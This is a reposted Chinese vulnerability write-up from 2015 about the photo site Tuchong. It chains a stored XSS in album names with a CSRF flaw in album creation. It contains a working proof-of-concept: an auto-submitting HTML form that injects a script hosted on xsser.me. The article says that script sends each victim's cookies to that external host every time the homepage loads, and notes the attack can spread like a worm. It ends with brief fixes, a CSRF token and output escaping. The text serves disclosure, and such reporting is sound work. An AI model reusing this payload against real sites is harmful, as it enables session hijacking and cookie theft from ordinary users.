鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

图虫网存储型xss+csrf=rootkit

来源:互联网 作者:佚名 时间:2015-10-19 08:36
当鸡肋的xss与鸡肋的csrf结合的时候。。。。 0x01.图虫网相册处相册名称未进行转义,可造成存储型xss,盗取用户cookies. 0x02.图虫网创建相册处无token,可通过csrf以用户身份创建账户。 这两个漏洞单看似乎很鸡肋,但是结合起来呢?利用csrf以用户的身份创建
当鸡肋的xss与鸡肋的csrf结合的时候。。。。

0x01.图虫网相册处相册名称未进行转义,可造成存储型xss,盗取用户cookies.
 
 
0x02.图虫网创建相册处无token,可通过csrf以用户身份创建账户。
 
这两个漏洞单看似乎很鸡肋,但是结合起来呢?利用csrf以用户的身份创建有xss脚本的相册(并且还可以以用户身份再发布一条图博使蠕虫进一步扩大),而相册名称又会在首页显示。这样,每次当受害用户访问首页时,xss代码就将被执行一次,用户修改密码也没用,只要一访问首页,新鲜的cookies就将被送到。
 
流程如下:
 
 
POC:
 
 
<html>
<body>
<form name="csrf" action="http://tuchong.com/api/album/create/" method="POST">
<input type=text name=type value="album"></input>
<input type=text name=title value="=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fxsser.me%

2FFNBn0V%3E%3C%2Fscript%3E"></input>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

 

 
访问后,返回了这个。
 
 
csed.jpg
 
 
每次都会向xsser.me发送cookies
 
cookies到了!
 
 


 
修复方案:

1.csrf方面,增加token;
 
2.xss方面,转义。
 
网友评论
<